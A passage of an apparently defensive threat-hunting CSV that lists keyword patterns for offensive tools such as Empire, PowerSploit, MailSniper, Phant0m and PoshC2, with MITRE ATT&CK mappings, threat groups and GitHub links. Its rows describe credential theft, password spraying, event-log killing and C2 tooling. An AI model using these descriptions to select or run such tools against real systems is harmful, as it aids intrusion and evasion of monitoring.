and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-Nightmare*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-noPac.*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" +"*Invoke-NTLMAuth.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-Ntsd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Obfuscation -ScriptPath *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-Obfuscation*","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3290","733","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" +"*Invoke-Obfuscation.psd1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-OpenInboxFinder*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-OpenOWAMailboxInBrowser*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Oxidresolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-P0wnedshell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-P0wnedshellx86*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-PacketKnock*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PasswordSpray*","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Phant0m*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*Invoke-Phant0m*","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Invoke-Phant0m*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Invoke-Phant0m.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Phant0m.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*Invoke-Phant0m.ps1*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*invoke-pipekat *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-Piper*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*Invoke-PiperClient*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral 